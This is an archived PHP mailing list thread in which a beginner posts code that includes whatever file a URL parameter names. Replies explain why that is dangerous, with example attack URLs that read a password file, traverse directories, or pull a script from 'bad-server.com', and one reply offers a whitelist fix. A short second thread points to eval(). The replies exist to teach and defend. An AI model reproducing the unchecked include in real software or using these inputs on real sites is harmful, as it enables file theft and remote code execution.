Re: [PHP] Dynamic PHP links
Eduard Grigoryan wrote: Hi, I'm new to PHP and I'd appreciate your advice a lot. I'm trying to use dynamic PHP links instead of plain HTML and I'm gonna use something like this: File index.php: ? a href=index.php?content=story.htmstory/abr a href=index.php?content=about.htmabout/abr ? if(isset($content)): include $content; else: include about.htm; endif; ? But a guy told me it is not preferable to use this method because of security considerations. I'm sure there is a common way of building dynamic links; am I on wrong way? Now that you (hopefully) understand the problem, here's a solution for THIS case: ?php if (!isset($content)) $content = 'about.htm'; switch($content){ case 'about.htm': case 'story.htm': include $content; break; default: die(Page not found); break; } You'll need to add one line for each page, but you will never accidentally try to include a file you didn't mean to include. -- Like Music? http://l-i-e.com/artists.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Dynamic PHP links
Hi, I'm new to PHP and I'd appreciate your advice a lot. I'm trying to use dynamic PHP links instead of plain HTML and I'm gonna use something like this: File index.php: ? a href=index.php?content=story.htmstory/abr a href=index.php?content=about.htmabout/abr ? if(isset($content)): include $content; else: include about.htm; endif; ? But a guy told me it is not preferable to use this method because of security considerations. I'm sure there is a common way of building dynamic links; am I on wrong way? Any help would be appreciated. Thank you in advance Best regards, Eduard Grigoryan * Armenian Freenet Catalog http://freenet.am/~edik_g http://armfn.net/~edik_g -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Dynamic PHP links
Hey, The reason your pal warned you against that approach is, someone could screw with your url with something like this: index.php?content=/etc/httpd/.dbmpasswd which would include that file if it exists...its a security problem, be careful and know EXACTLY what you are including/requiring. -Ryan On 2/12/2005 10:33:10 AM, Eduard Grigoryan ([EMAIL PROTECTED]) wrote: Hi, I'm new to PHP and I'd appreciate your advice a lot. I'm trying to use dynamic PHP links instead of plain HTML and I'm gonna use something like this: File index.php: ? a href=index.php?content=story.htmstory/abr a href=index.php?content=about.htmabout/abr ? if(isset($content)): include $content; else: include about.htm; endif; ? But a guy told me it is not preferable to use this method because of security considerations. I'm sure there is a common way of building dynamic links; am I on wrong way? Any help would be appreciated. Thank you in advance Best regards, Eduard Grigoryan * Armenian Freenet Catalog http://freenet.am/~edik_g http://armfn.net/~edik_g -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- No virus found in this outgoing message. Checked by AVG Anti-Virus. Version: 7.0.300 / Virus Database: 265.8.7 - Release Date: 2/10/2005 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Dynamic PHP links
Eduard Grigoryan wrote: Hi, I'm new to PHP and I'd appreciate your advice a lot. I'm trying to use dynamic PHP links instead of plain HTML and I'm gonna use something like this: File index.php: ? a href=index.php?content=story.htmstory/abr a href=index.php?content=about.htmabout/abr ? if(isset($content)): include $content; else: include about.htm; endif; ? But a guy told me it is not preferable to use this method because of security considerations. I'm sure there is a common way of building dynamic links; am I on wrong way? You can search the list archives for posts regarding this topic (it comes up alot). There are safer ways to do what you are doing. One simple way to hack your script as written above would be to type : index.php?content=../some/secret/file.txt or, index.php?content=http://www.bad-server.com/badscript.php in the browser's address bar. Regards, Burhan -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Dynamic PHP
Hello! I'm sure I read this somewhere but I'm just not so sure now. Can you produce PHP code in a PHP page and then run it. Kind of like this: ?php $mycode=echo'Hello';; # Something here to execute $mycode ? Is the above possible?? Thanks! Chris. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] To contact the list administrators, e-mail: [EMAIL PROTECTED]
Re: [PHP] Dynamic PHP
Chris Hemmings wrote: Hello! I'm sure I read this somewhere but I'm just not so sure now. Can you produce PHP code in a PHP page and then run it. Kind of like this: ?php $mycode=echo'Hello';; # Something here to execute $mycode ? Maybe U need this function: http://www.php.net/manual/en/function.eval.php -- Pavel a.k.a. Papi -- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] To contact the list administrators, e-mail: [EMAIL PROTECTED]